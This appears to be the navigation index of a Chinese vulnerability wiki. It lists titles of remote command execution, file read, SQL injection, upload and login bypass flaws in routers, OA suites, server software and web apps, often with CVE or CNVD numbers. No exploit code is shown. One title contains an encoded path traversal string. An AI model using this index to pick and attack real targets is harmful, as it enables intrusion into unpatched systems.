    宏电 H8922 后台任意文件读取漏洞 CVE-2021-28152
    
    宏电 H8922 后台命令执行漏洞 CVE-2021-28150
    
    宏电 H8922 后台管理员信息泄露漏洞 CVE-2021-28151
    
    小米
    小米
    
    小米路由器 c_upload 远程命令执行漏洞 CVE-2019-18370
    
    小米路由器 extdisks 任意文件读取漏洞 CVE-2019-18371
    
    惠尔顿
    惠尔顿
    
    惠尔顿 e地通 config.xml 信息泄漏漏洞
    
    才茂通信
    才茂通信
    
    才茂通信网关 formping 远程命令执行漏洞
    
    朗视
    朗视
    
    朗视 TG400 GSM 网关目录遍历 CVE-2021-27328
    
    百卓
    百卓
    
    百卓 Patflow showuser.php 后台SQL注入漏洞
    
    百卓 Smart importhtml.php 远程命令执行漏洞
    
    皓峰
    皓峰
    
    皓峰防火墙 setdomain.php 越权访问漏洞
    
    磊科
    磊科
    
    磊科 NI360路由器 netcore_loginnetcore_login 认证绕过漏洞
    
    联软
    联软
    
    联软安界 UniSDP 软件定义边界系统 commondRetSt 命令执行漏洞
    
    菲力尔
    菲力尔
    
    FLIR-AX8 download.php 任意文件下载
    
    FLIR-AX8 res.php 后台命令执行漏洞
    
    蜂网互联
    蜂网互联
    
    蜂网互联企业级路由器v4.31 密码泄露漏洞 CVE-2019-16313
    
    西迪特
    西迪特
    
    西迪特 Wi-Fi Web管理 Cookie 越权访问漏洞
    
    西迪特 Wi-Fi Web管理 jumpto.php 后台命令执行漏洞
    
    迈普
    迈普
    
    迈普 ISG1000安全网关 sys_dia_data_down 任意文件下载漏洞
    
    通力电梯
    通力电梯
    
    KONE 通力电梯管理系统 app_show_log_lines.php 任意文件读取漏洞
    
    金山
    金山
    
    金山 VGM防毒墙 downFile.php 任意文件读取漏洞
    
    锐捷
    锐捷
    
    锐捷 BCR商业无线云网关后台命令执行漏洞
    
    锐捷 EG易网关 branch_passw.php 远程命令执行
    
    锐捷 EG易网关 cli.php 远程命令执行漏洞
    
    锐捷 EG易网关 download.php 任意文件读取漏洞
    
    锐捷 EG易网关 login.php 管理员账号密码泄露漏洞
    
    锐捷 EG易网关 phpinfo.view.php 信息泄露漏洞
    
    锐捷 NBR 1300G路由器越权CLI命令执行漏洞
    
    锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞
    
    锐捷 NBR 路由器 guestIsUp.php 远程命令执行漏洞 CNVD-2021-09650
    
    锐捷 RG-UAC 账号密码信息泄露 CNVD-2021-14536
    
    锐捷 Smartweb管理系统密码信息泄露漏洞
    
    飞鱼星
    飞鱼星
    
    飞鱼星企业级智能上网行为管理系统权限绕过信息泄露漏洞
    
    飞鱼星家用智能路由 cookie.cgi 权限绕过
  - Language
    Language
    
    开发语言漏洞
    
    Go
    Go
    
    GO TLS握手崩溃漏洞 CVE-2021-34558
    
    PHP
    PHP
    
    PHP zerodium后门漏洞
  - Oa
    Oa
    
    OA产品漏洞
    
    O2OA
    O2OA
    
    O2OA invoke 后台远程命令执行漏洞 CNVD-2020-18740
    
    O2OA open 后台任意文件读取漏洞
    
    一米OA
    一米OA
    
    一米OA getfile.jsp 任意文件读取漏洞
    
    万户OA
    万户OA
    
    万户OA DocumentEdit.jsp SQL注入漏洞
    
    万户OA DownloadServlet 任意文件读取漏洞
    
    万户OA OfficeServer.jsp 任意文件上传漏洞
    
    万户OA TeleConferenceService XXE注入漏洞
    
    万户OA download_ftp.jsp 任意文件下载漏洞
    
    万户OA download_old.jsp 任意文件下载漏洞
    
    万户OA downloadhttp.jsp 任意文件下载漏洞
    
    万户OA fileUpload.controller 任意文件上传漏洞
    
    万户OA showResult.action 后台SQL注入漏洞
    
    万户OA smartUpload.jsp 任意文件上传漏洞
    
    信呼OA
    信呼OA
    
    信呼OA beifenAction.php 后台目录遍历漏洞
    
    华天OA
    华天OA
    
    华天动力OA 8000版 workFlowService SQL注入漏洞
    
    帆软OA
    帆软OA
    
    帆软报表 V8 get_geo_json 任意文件读取漏洞 CNVD-2018-04757
    
    帆软报表 V9 design_save_svg 任意文件覆盖文件上传
    
    新点OA
    新点OA
    
    新点OA ExcelExport 敏感信息泄露漏洞
    
    智明OA
    智明OA
    
    智明 SmartOA EmailDownload.ashx 任意文件下载漏洞
    
    极限OA
    极限OA
    
    极限OA video_file.php 任意文件读取漏洞
    
    泛微OA
    泛微OA
    
    泛微OA E-Bridge saveYZJFile 任意文件读取漏洞
    
    泛微OA E-Cology BshServlet 远程代码执行漏洞 CNVD-2019-32204
    
    泛微OA E-Cology HrmCareerApplyPerView.jsp SQL注入漏洞
    
    泛微OA E-Cology LoginSSO.jsp SQL注入漏洞 CNVD-2021-33202
    
    泛微OA E-Cology VerifyQuickLogin.jsp 任意管理员登录漏洞
    
    泛微OA E-Cology WorkflowCenterTreeData SQL注入漏洞
    
    泛微OA E-Cology browser.jsp SQL注入漏洞
    
    泛微OA E-Cology getSqlData SQL注入漏洞
    
    泛微OA E-Cology getdata.jsp SQL注入漏洞
    
    泛微OA E-Cology jqueryFileTree.jsp 目录遍历漏洞
    
    泛微OA E-Cology uploadOperation.jsp 任意文件上传
    
    泛微OA E-Cology users.data 敏感信息泄漏
    
    泛微OA E-Office OfficeServer.php 任意文件上传漏洞
    
    泛微OA E-Office UploadFile.php 任意文件上传漏洞 CNVD-2021-49104
    
    泛微OA E-Office UserSelect 未授权访问漏洞
    
    泛微OA E-Office group_xml.php SQL注入漏洞
    
    泛微OA E-Office mysql_config.ini 数据库信息泄漏漏洞
    
    泛微OA E-Office officeserver.php 任意文件读取漏洞
    
    泛微OA E-Office uploadify 任意文件上传漏洞
    
    泛微OA E-Weaver SignatureDownLoad 任意文件读取漏洞
    
    泛微OA E-Weaver ln.FileDownload 任意文件读取漏洞
    
    泛微OA E-Weaver weaver.common.Ctrl 任意文件上传漏洞漏洞描述
    
    源天OA
    源天OA
    
    源天OA GetDataAction SQL注入漏洞
    
    用友OA
    用友OA
    
    用友 ERP-NC NCFindWeb 目录遍历漏洞
    
    用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞
    
    用友 GRP-U8 Proxy SQL注入 CNNVD-201610-923
    
    用友 GRP-U8 UploadFileData 任意文件上传漏洞
    
    用友 NC Cloud jsinvoke 任意文件上传漏洞
    
    用友 NC NCFindWeb 任意文件读取漏洞
    
    用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
    
    用友 NCCloud FS文件管理SQL注入
    
    用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件上传漏洞
    
    用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件读取漏洞
    
    用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞
    
    用友 U8 OA test.jsp SQL注入漏洞
    
    用友移动管理系统 uploadApk.do 任意文件上传漏洞
    
    红帆OA
    红帆OA
    
    红帆OA ioFileExport.aspx 任意文件读取漏洞
    
    致翔OA
    致翔OA
    
    致翔OA msglog.aspx SQL注入漏洞
    
    致远OA
    致远OA
    
    致远OA A6 DownExcelBeanServlet 用户敏感信息泄露
    
    致远OA A6 config.jsp 敏感信息泄漏漏洞
    
    致远OA A6 createMysql.jsp 数据库敏感信息泄露
    
    致远OA A6 initDataAssess.jsp 用户敏感信息泄露
    
    致远OA A6 setextno.jsp SQL注入漏洞
    
    致远OA A6 test.jsp SQL注入漏洞
    
    致远OA A8 htmlofficeservlet 任意文件上传漏洞
    
    致远OA A8 status.jsp 信息泄露漏洞
    
    致远OA ajax.do 任意文件上传 CNVD-2021-01627
    
    致远OA getSessionList.jsp Session泄漏漏洞
    
    致远OA webmail.do 任意文件下载 CNVD-2020-62422
    
    致远OA wpsAssistServlet 任意文件上传漏洞
    
    致远OA 帆软组件 ReportServer 目录遍历漏洞
    
    蓝凌OA
    蓝凌OA
    
    蓝凌OA admin.do JNDI远程命令执行
    
    蓝凌OA custom.jsp 任意文件读取漏洞
    
    蓝凌OA kmImeetingRes.do 后台SQL注入漏洞 CNVD-2021-01363
    
    蓝凌OA sysSearchMain.do 远程命令执行漏洞
    
    蓝凌OA treexml.tmpl 远程命令执行漏洞
    
    通达OA
    通达OA
    
    通达OA v11.2 upload.php 后台任意文件上传漏洞
    
    通达OA v11.5 login_code.php 任意用户登录
    
    通达OA v11.5 logincheck_code.php 登陆绕过漏洞
    
    通达OA v11.5 swfupload_new.php SQL注入漏洞
    
    通达OA v11.6 insert SQL注入漏洞
    
    通达OA v11.6 print.php 任意文件删除&RCE
    
    通达OA v11.6 report_bi.func.php SQL注入漏洞
    
    通达OA v11.7 auth_mobi.php 在线用户登录漏洞
    
    通达OA v11.7 delete_cascade.php 后台SQL注入
    
    通达OA v11.8 api.ali.php 任意文件上传漏洞
    
    通达OA v11.8 getway.php 远程文件包含漏洞
    
    通达OA v11.8 update.php 后台文件包含命令执行漏洞
    
    通达OA v11.9 getdata 任意命令执行漏洞
    
    通达OA v11.9 upsharestatus 后台SQL注入漏洞
    
    通达OA v2014 get_contactlist.php 敏感信息泄漏漏洞
    
    通达OA v2017 action_upload.php 任意文件上传漏洞
    
    通达OA v2017 video_file.php 任意文件下载漏洞
    
    金和OA
    金和OA
    
    金和OA C6 EditMain.aspx 后台文件写入漏洞
    
    金和OA C6 OpenFile.aspx 后台越权敏感文件遍历漏洞
    
    金和OA C6 download.jsp 任意文件读取漏洞
    
    金蝶OA
    金蝶OA
    
    金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞
    
    金蝶OA server_file 目录遍历漏洞
    
    金蝶OA 云星空 kdsvc 远程命令执行漏洞
  - Serverapp
    Serverapp
    
    服务器应用漏洞
    
    Chrome
    Chrome
    
    Chrome 浏览器未开启沙箱远程命令执行漏洞
    
    ClickHouse
    ClickHouse
    
    ClickHouse API 数据库接口未授权访问漏洞
    
    Git
    Git
    
    Git-LFS 远程命令执行漏洞 CVE-2020-27955
    
    Microsoft Exchange
    Microsoft Exchange
    
    Microsoft Exchange SSRF漏洞 CVE-2021-26885
    
    Microsoft Exchange autodiscover.json 反射型XSS CVE-2021-41349
    
    MinIO
    MinIO
    
    MinIO SSRF漏洞 CVE-2021-21287
    
    MinIO verify 敏感信息泄漏漏洞 CVE-2023-28432
    
    NVIDIA
    NVIDIA
    
    NVIDIA GPU显示驱动程序信息泄露 CVE-2021-1056
    
    Openssh
    Openssh
    
    OpenSSH 命令注入漏洞 CVE-2020-15778
    
    Openssl
    Openssl
    
    OpenSSL 心脏滴血漏洞 CVE-2014-0160
    
    QEMU
    QEMU
    
    QEMU 虚拟机逃逸漏洞 CVE-2020-14364
    
    Redis
    Redis
    
    Redis Lua 沙箱绕过远程命令执行 CVE-2022-0543
    
    Redis 小于5.0.5 主从复制远程命令执行漏洞
    
    Saltstack
    Saltstack
    
    SaltStack 未授权访问命令执行漏洞 CVE-2020-16846 25592
    
    Saltstack 远程命令执行漏洞 CVE-2020-11651 11652
    
    VMware
    VMware
    
    VMware Workspace ONE Access SSTI漏洞 CVE-2022-22954
    
    VMware vCenter vid 任意文件读取漏洞
    
    VMware vRealize Operations Manager SSRF漏洞 CVE-2021-21975
    
    VoIPmonitor
    VoIPmonitor
    
    VoIPmonitor 远程命令执行漏洞 CVE-2021-30461
    
    WordPress
    WordPress
    
    WordPress 3DPrint Lite 3dprint-lite-functions.php 任意文件上传漏洞
    
    WordPress All-in-One Video Gallery video.php 任意文件读取漏洞 CVE-2022-2633
    
    WordPress Duplicator duplicator.php 任意文件读取漏洞 CVE-2020-11738
    
    WordPress Redux Framework class-redux-helpers.php 敏感信息泄漏漏洞 CVE-2021-38314
    
    WordPress Simple File List ee-downloader.php 任意文件读取漏洞 CVE-2022-1119
    
    WordPress Welcart e-Commerce progress-check.php 任意文件读取漏洞 CVE-2022-41840
    
    向日葵
    向日葵
    
    向日葵 check 远程命令执行漏洞 CNVD-2022-10270
  - System
    System
    
    操作系统漏洞
    
    Linux
    Linux
    
    Linux DirtyPipe权限提升漏洞 CVE-2022-0847
    
    Linux Polkit权限提升漏洞 CVE-2021-4034
    
    Linux eBPF权限提升漏洞 CVE-2022-23222
    
    Linux kernel权限提升漏洞 CVE-2021-3493
    
    Linux openvswitch权限提升漏洞 CVE-2022-2639
    
    Linux sudo权限提升漏洞 CVE-2021-3156
    
    Windows
    Windows
    
    Windows CryptoAPI欺骗漏洞 CVE-2020-0601
    
    Windows SMB远程代码执行漏洞 CVE-2020-0796
    
    Windows Win32k 内核提权漏洞 CVE-2022-21882
    
    Windows Win32k 本地提权漏洞 CVE-2021-1732
  - Webapp
    Webapp
    
    Web应用漏洞
    
    1Panel
    1Panel
    
    1Panel loadfile 后台文件读取漏洞
    
    AVEVA
    AVEVA
    
    AVEVA InTouch安全网关 AccessAnywhere 任意文件读取漏洞 CVE-2022-23854
    
    Adobe ColdFusion
    Adobe ColdFusion
    
    Adobe ColdFusion upload.cfm 任意文件上传漏洞 CVE-2018-15961
    
    Alibaba AnyProxy
    Alibaba AnyProxy
    
    Alibaba AnyProxy fetchBody 任意文件读取漏洞
    
    AlibabaCanal
    AlibabaCanal
    
    Alibaba Canal config 云密钥信息泄露漏洞
    
    AlibabaNacos
    AlibabaNacos
    
    Alibaba Nacos secret.key默认密钥未授权访问漏洞
    
    Alibaba Nacos user 未授权访问漏洞
    
    Appspace
    Appspace
    
    Appspace jsonprequest SSRF漏洞 CVE-2021-27670
    
    Atlassian Bitbucket
    Atlassian Bitbucket
    
    Atlassian Bitbucket archive 远程命令执行漏洞 CVE-2022-36804
    
    AtlassianConfluence
    AtlassianConfluence
    
    Atlassian Confluence OGNL注入漏洞 CVE-2022-26134
    
    Atlassian Confluence doenterpagevariables.action 远程命令执行漏洞 CVE-2021-26084
    
    Atlassian Confluence preview SSTI模版注入漏洞 CVE-2019-3396
    
    AtlassianJira
    AtlassianJira
    
    Atlassian Jira ViewUserHover.jspa 用户信息泄露漏洞 CVE-2020-14181
    
    Atlassian Jira cfx 任意文件读取漏洞 CVE-2021-26086
    
    Atlassian Jira com.atlassian.jira 敏感信息泄漏 CVE-2019-8442
    
    Atlassian Jira groupuserpicker 用户信息枚举漏洞 CVE-2019-8449
    
    Atlassian Jira makeRequest SSRF漏洞 CVE-2019-8451
    
    Bitbucket
    Bitbucket
    
    Bitbucket 登录绕过漏洞
    
    CMA客诉管理系统
    CMA客诉管理系统
    
    CMA客诉管理系统 upFile.ashx 任意文件上传漏洞
    
    Cacti
    Cacti
    
    Cacti remote_agent.php 远程命令执行漏洞 CVE-2022-46169
    
    Casbin
    Casbin
    
    Casbin get-users 账号密码泄漏漏洞
    
    Casdoor get-organizations SQL注入漏洞 CVE-2022-24124
    
    Cerebro
    Cerebro
    
    Cerebro request SSRF漏洞
    
    Citrix XenMobile
    Citrix XenMobile
    
    Citrix XenMobile 任意文件读取 CVE-2020-8209
    
    Crawlab
    Crawlab
    
    Crawlab file 任意文件读取漏洞
    
    Crawlab users 任意用户添加漏洞
    
    Dapr
    Dapr
    
    Dapr Dashboard configurations 未授权访问漏洞 CVE-2022-38817
    
    Dogtag
    Dogtag
    
    Dogtag PKI XML实体注入漏洞 CVE-2022-2414
    
    Dolibarr
    Dolibarr
    
    Dolibarr edit.php 远程命令执行漏洞 CVE-2022-40871
    
    EasyImage
    EasyImage
    
    EasyImage down.php 任意文件读取漏洞
    
    EasyImage manager.php 后台任意文件上传漏洞
    
    Evolucare
    Evolucare
    
    Evolucare Ecsimaging download_stats_dicom.php 任意文件读取漏洞
    
    Evolucare Ecsimaging new_movie.php 远程命令执行漏洞
    
    F5 BIG IP
    F5 BIG IP
    
    F5 BIG-IP iControl REST身份认证绕过漏洞 CVE-2022-1388
    
    F5 BIG-IP 远程代码执行漏洞 CVE-2020-5902
    
    F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986
    
    Fhem
    Fhem
    
    Fhem FileLog_logWrapper 任意文件读取漏洞 CVE-2020-19360
    
    Franklin
    Franklin
    
    Franklin Fueling Systems tsaupload.cgi 任意文件读取漏洞 CVE-2021-46417
    
    GLPI
    GLPI
    
    GLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914
    
    Gerapy
    Gerapy
    
    Gerapy clone 后台远程命令执行漏洞 CVE-2021-32849
    
    Gerapy parse 后台远程命令执行漏洞
    
    Gerapy read 后台任意文件读取漏洞
    
    GitLab
    GitLab
    
    GitLab Graphql邮箱信息泄露漏洞 CVE-2020-26413
    
    GitLab SSRF漏洞 CVE-2021-22214
    
    Go fastdfs
    Go fastdfs
    
    Go-fastdfs GetClientIp 未授权访问漏洞
    
    Go-fastdfs upload 任意文件上传漏洞 CVE-2023-1800
    
    Grafana
    Grafana
    
    Grafana mysql 后台任意文件读取漏洞 CVE-2019-19499
    
    Grafana plugins 任意文件读取漏洞 CVE-2021-43798
    
    H3C
    H3C
    
    H3C IMC dynamiccontent.properties.xhtm 远程命令执行 CNVD-2021-39067
    
    H3C SecParh堡垒机 data_provider.php 远程命令执行漏洞
    
    H3C SecParh堡垒机 get_detail_view.php 任意用户登录漏洞
    
    Harbor
    Harbor
    
    Harbor 未授权创建管理员漏洞 CVE-2019-16097
    
    Hue
    Hue
    
    Hue 后台编辑器远程命令执行漏洞
    
    ICEFlow
    ICEFlow
    
    ICEFlow VPN log 信息泄露漏洞
    
    IceWarp
    IceWarp
    
    IceWarp WebClient basic 远程命令执行漏洞
    
    JeecgBoot
    JeecgBoot
    
    JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞 CVE-2023-1454
    
    Jellyfin
    Jellyfin
    
    Jellyfin RemoteImageController.cs SSRF漏洞 CVE-2021-29490
    
    Jellyfin stream.mp3 任意文件读取漏洞 CVE-2021-21402
    
    Joomla
    Joomla
    
    Joomla application 未授权访问漏洞 CVE-2023-23752
    
    JumpServer
    JumpServer
    
    JumpServer 未授权接口远程命令执行漏洞
    
    Jupyter Notebook
    Jupyter Notebook
    
    Jupyter Notebook 未授权访问远程命令执行漏洞
    
    Konga
    Konga
    
    Konga 普通用户越权获取管理员权限漏洞
    
    KubeOperator
    KubeOperator
    
    KubeOperator kubeconfig 未授权访问漏洞 CVE-2023-22480
    
    KubePi
    KubePi
    
    KubePi LoginLogsSearch 未授权访问漏洞 CVE-2023-22478
    
    Lanproxy
    Lanproxy
    
    Lanproxy 目录遍历漏洞 CVE-2021-3019
    
    LimeSurvey
    LimeSurvey
    
    LimeSurvey LimeSurveyFileManager.php 后台任意文件读取漏洞 CVE-2020-11455
    
    MKdocs
    MKdocs
    
    MKdocs 任意文件读取漏洞 CVE-2021-40978
    
    MLflow
    MLflow
    
    MLflow get-artifact 任意文件读取漏洞 CVE-2023-1177
    
    MessageSolution
    MessageSolution
    
    MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543
    
    Metabase
    Metabase
    
    Metabase geojson 任意文件读取漏洞 CVE-2021-41277
    
    MeterSphere
    MeterSphere
    
    MeterSphere customMethod 远程命令执行漏洞
    
    Metersphere file 任意文件读取漏洞 CVE-2023-25573
    
    NPS
    NPS
    
    NPS auth_key 未授权访问漏洞
    
    Nexus
    Nexus
    
    Nexus Repository Manger change-password 低权限修改管理员密码漏洞 CVE-2020-11444
    
    Nexus Repository Manger extdirect 后台远程命令执行 CVE-2020-10204
    
    Nexus Repository Manger extdirect 远程命令执行 CVE-2019-7238
    
    Nexus Repository Manger group 后台远程命令执行 CVE-2020-10199
    
    Node RED
    Node RED
    
    Node-RED ui_base 任意文件读取漏洞
    
    OneBlog
    OneBlog
    
    OneBlog Shiro默认密钥远程命令执行漏洞
    
    PowerJob
    PowerJob
    
    PowerJob list 信息泄漏漏洞 CVE-2023-29923
    
    Riskscanner
    Riskscanner
    
    Riskscanner list SQL注入漏洞
    
    RoxyWi
    RoxyWi
    
    Roxy-Wi options.py 远程命令执行漏洞 CVE-2022-31137
    
    ShowDoc
    ShowDoc
    
    ShowDoc AdminUpdateController.class.php 任意文件上传漏洞 CVE-2021-36440
    
    ShowDoc PageController.class.php任意文件上传漏洞
    
    SolarView
    SolarView
    
    SolarView Compact conf_mail.php 远程命令执行漏洞 CVE-2022-29303
    
    SolarView network_test.php 远程命令执行漏洞 CVE-2022-40881
    
    SonarQube
    SonarQube
    
    SonarQube search_projects 项目信息泄露漏洞
    
    SonarQube values 信息泄露漏洞 CVE-2020-27986
    
    SpiderFlow
    SpiderFlow
    
    SpiderFlow save 远程命令执行漏洞
    
    TamronOS
    TamronOS
    
    TamronOS IPTV系统 ping 任意命令执行漏洞
    
    TamronOS IPTV系统 submit 任意用户创建漏洞
    
    TerraMaster
    TerraMaster
    
    TerraMaster TOS createRaid 远程命令执行漏洞 CVE-2022-24989
    
    TerraMaster TOS exportUser.php 远程命令执行
    
    TerraMaster TOS makecvs.php 远程命令执行漏洞 CVE-2020-28188
    
    TerraMaster TOS 任意账号密码修改漏洞 CVE-2020-28186
    
    TerraMaster TOS 信息泄漏漏洞 CVE-2022-24990
    
    TerraMaster TOS 后台任意文件读取漏洞 CVE-2020-28187
    
    TerraMaster TOS 用户枚举漏洞 CVE-2020-28185
    
    V2Board
    V2Board
    
    V2Board Admin.php 越权访问漏洞
    
    WSO2
    WSO2
    
    WSO2 fileupload 任意文件上传漏洞 CVE-2022-29464
    
    WSO2 proxy SSRF漏洞 WSO2-2019-0598
    
    Webgrind
    Webgrind
    
    Webgrind fileviewer.phtml 任意文件读取漏洞 CVE-2018-12909
    
    Webmin
    Webmin
    
    Webmin password_change.cgi 远程命令执行漏洞 CVE-2019-15107
    
    Webmin rpc.cgi 后台远程命令执行漏洞 CVE-2019-15642
    
    Webmin update.cgi 后台远程命令执行漏洞 CVE-2022-0824
    
    WiseGiga
    WiseGiga
    
    WiseGiga NAS down_data.php 任意文件下载漏洞
    
    WiseGiga NAS group.php 远程命令执行漏洞
    
    XXL JOB
    XXL JOB
    
    XXL-JOB 任务调度中心后台任意命令执行漏洞
    
    YApi
    YApi
    
    YApi 接口管理平台 up SQL注入漏洞
    
    YApi 接口管理平台后台命令执行漏洞
    
    eGroupWare
    eGroupWare
    
    eGroupWare spellchecker.php 远程命令执行漏洞
    
    Imo云办公室
    Imo云办公室
    
    imo 云办公室 Imo_DownLoadUI.php 任意文件下载漏洞
    
    imo 云办公室 corpfile.php 远程命令执行漏洞
    
    imo 云办公室 get_file.php 远程命令执行漏洞
    
    kkFileView
    kkFileView
    
    kkFileView getCorsFile 任意文件读取漏洞 CVE-2021-43734
    
    nginxWebUI
    nginxWebUI
    
    nginxWebUI cmdOver 后台命令执行漏洞
    
    nginxWebUI runCmd 远程命令执行漏洞
    
    七牛云
    七牛云
    
    七牛云 logkit log_path 任意文件读取漏洞
    
    三汇
    三汇
    
    三汇SMG 网关管理软件 down.php 任意文件读取漏洞
    
    中创视迅
    中创视迅
    
    会捷通云视讯 fileDownload 任意文件读取漏洞
    
    会捷通云视讯 list 目录文件泄露漏洞
    
    会捷通云视讯登录绕过漏洞
    
    中科网威
    中科网威
    
    中科网威 NPFW防火墙 CommandsPolling.php 任意文件读取漏洞
    
    中远麒麟堡垒机
    中远麒麟堡垒机
    
    中远麒麟 iAudit堡垒机 get_luser_by_sshport.php 远程命令执行漏洞
    
    久其软件
    久其软件
    
    久其财务报表 download.jsp 任意文件读取漏洞
    
    云时空ERP
    云时空ERP
    
    云时空社会化商业ERP系统 Shiro框架远程命令执行漏洞
    
    云时空社会化商业ERP系统 validateLoginName SQL注入漏洞
    
    亿邮
    亿邮
    
    亿邮电子邮件系统 moni_detail.do 远程命令执行漏洞
    
    任我行
    任我行
    
    任我行 CRM SmsDataList SQL注入漏洞
    
    企望
    企望
    
    企望制造 ERP comboxstore.action 远程命令执行漏洞
    
    众望网络
    众望网络
    
    众望网络微议管理系统后台updatefile.html 任意文件上传漏洞
    
    信诺瑞得
    信诺瑞得
    
    信诺瑞得 WiseGrid慧敏应用交付网关 sysadmin_action.php 后台命令执行漏洞
    
    吉拉科技
    吉拉科技
    
    吉拉科技 LVS精益价值管理系统 Business 目录遍历漏洞
    
    和信创天云
    和信创天云
    
    和信创天云桌面系统 upload_file.php 远程命令执行漏洞
    
    图创软件
    图创软件
    
    图创软件图书馆站群管理系统任意文件读取漏洞
    
    天融信
    天融信
    
    天融信 TopApp-LB enable_tool_debug.php 远程命令执行漏洞
    
    天融信 TopApp-LB 登陆绕过漏洞
    
    孚盟云
    孚盟云
    
    孚盟云 AjaxMethod.ashx SQL注入漏洞
    
    安天
    安天
    
    安天高级可持续威胁安全检测系统越权访问漏洞
    
    安美数字
    安美数字
    
    安美数字酒店宽带运营系统 server_ping.php 远程命令执行漏洞
    
    宏景
    宏景
    
    宏景 HCM codesettree SQL注入漏洞 CNVD-2023-08743
    
    宝塔
    宝塔
    
    宝塔 phpmyadmin未授权访问漏洞
    
    广联达
    广联达
    
    广联达 Linkworks GetIMDictionary SQL注入漏洞
    
    广联达 Linkworks msgbroadcastuploadfile.aspx 后台文件上传漏洞
    
    拓尔思
    拓尔思
    
    拓尔思 MAS testCommandExecutor.jsp 远程命令执行漏洞
    
    昆石网络
    昆石网络
    
    昆石网络 VOS3000虚拟运营支撑系统 %c0%ae%c0%ae 任意文件读取漏洞
    
    星锐蓝海
    星锐蓝海
    
    蓝海卓越计费管理系统 debug.php 远程命令执行漏洞
    
    蓝海卓越计费管理系统 download.php 任意文件读取漏洞
    
    极通EWEBS
    极通EWEBS
    
    极通EWEBS casmain.xgi 任意文件读取漏洞
    
    汇文
    汇文
    
    汇文图书馆书目检索系统 config.properties 信息泄漏漏洞
    
    汉得
    汉得
    
    汉得SRM tomcat.jsp 登陆绕过漏洞
    
    浪潮
    浪潮
    
    浪潮ClusterEngineV4.0 sysShell 任意命令执行漏洞
    
    浪潮ClusterEngineV4.0 任意用户登录漏洞
    
    浪潮ClusterEngineV4.0 远程命令执行漏洞 CVE-2020-21224
    
    深信服
    深信服
    
    深信服应用交付报表系统 download.php 任意文件读取漏洞
    
    深信服应用交付管理系统 login 远程命令执行漏洞
    
    深信服应用交付管理系统 sys_user.conf 账号密码泄漏漏洞
    
    深信服日志中心 c.php 远程命令执行漏洞
    
    深信服行为感知系统 c.php 远程命令执行漏洞
    
    瑞友
    瑞友
    
    瑞友应用虚拟化系统 GetBSAppUrl SQL注入漏洞
    
    用友
    用友
    
    用友畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞
    
    用友畅捷通T+ GetStoreWarehouseByStore 远程命令执行漏洞
    
    用友畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞
    
    用友畅捷通T+ Upload.aspx 任意文件上传漏洞
    
    用友畅捷通远程通 GNRemote.dll SQL注入漏洞
    
    畅捷CRM
    畅捷CRM
    
    畅捷CRM get_usedspace.php SQL注入漏洞
    
    畅捷CRM 后台附件任意文件上传漏洞
    
    科达
    科达
    
    科达 MTS转码服务器任意文件读取漏洞
    
    科达网络键盘控制台任意文件读取漏洞
    
    科迈
    科迈
    
    科迈 RAS系统 Cookie验证越权漏洞
    
    紫光软件
    紫光软件
    
    紫光档案管理系统 editPass.html SQL注入漏洞 CNVD-2021-41638
    
    紫光档案管理系统 upload.html 后台文件上传漏洞
    
    绿盟
    绿盟
    
    绿盟 BAS日志数据安全性分析系统 accountmanage 未授权访问漏洞
    
    绿盟 NF下一代防火墙任意文件上传漏洞
    
    绿盟 SAS堡垒机 Exec 远程命令执行漏洞
    
    绿盟 SAS堡垒机 GetFile 任意文件读取漏洞
    
    绿盟 SAS堡垒机 local_user.php 任意用户登录漏洞
    
    绿盟 UTS综合威胁探针信息泄露登陆绕过漏洞
    
    腾讯
    腾讯
    
    腾讯企业微信 agentinfo 信息泄漏漏洞
    
    若依管理系统
    若依管理系统
    
    若依管理系统后台任意文件读取 CNVD-2021-01931
    
    辰信领创
    辰信领创
    
    辰信领创辰信景云终端安全管理系统 login SQL注入漏洞
    
    金山
    金山
    
    金山 V8 终端安全系统 downfile.php 任意文件读取漏洞
    
    金山 V8 终端安全系统 get_file_content.php 任意文件读取漏洞
    
    金山 V8 终端安全系统 pdf_maker.php 命令执行漏洞
    
    金盘
    金盘
    
    金盘微信管理平台 getsysteminfo 未授权访问漏洞
    
    金笛
    金笛
    
    金笛短信中间件Web版 log 后台任意文件下载漏洞 CNVD-2021-57336
    
    银澎云计算
    银澎云计算
    
    银澎云计算好视通视频会议系统任意文件下载 CNVD-2020-62437
    
    银达汇智
    银达汇智
    
    银达汇智智慧综合管理平台 FileDownLoad.aspx 任意文件读取漏洞
    
    银达汇智智慧综合管理平台 FileUp.aspx 任意文件上传漏洞
    
    零视科技
    零视科技
    
    零视科技 H5S视频平台 GetUserInfo 信息泄漏漏洞 CNVD-2020-67113
    
    霆智科技
    霆智科技
    
    霆智科技 VA虚拟应用平台任意文件读取漏洞
    
    飞视美
    飞视美
    
    飞视美视频会议系统 Struts2 远程命令执行漏洞
    
    魅课信息
    魅课信息
    
    魅课 OM视频会议系统 proxy.php 文件包含漏洞
    
    齐治堡垒机
    齐治堡垒机
    
    齐治堡垒机 gui_detail_view.php 任意用户登录漏洞
  - Webserver
    Webserver
    
    Web服务器漏洞
    
    Apache
    Apache
    
    Apache ActiveMQ 反序列化漏洞 CVE-2015-5254
    
    Apache Cocoon XML注入 CVE-2020-11991
    
    Apache CouchDB epmd 远程命令执行漏洞 CVE-2022-24706
    
    Apache Druid LoadData 任意文件读取漏洞 CVE-2021-36749
    
    Apache Druid sampler kafka 远程命令执行漏洞
    
    Apache Druid sampler 远程代码执行漏洞 CVE-2021-25646
    
    Apache Flink jobmanager 目录遍历漏洞 CVE-2020-17519
    
    Apache Flink upload 远程命令执行漏洞 CVE-2020-17518
    
    Apache HTTPd 换行解析漏洞 CVE-2017-15715
    
    Apache HTTPd 路径穿越漏洞 CVE-2021-42013
    
    Apache HTTPd 路径穿越漏洞 CVE-2021-41773
    
    Apache Hadoop Yarn RPC 远程命令执行漏洞
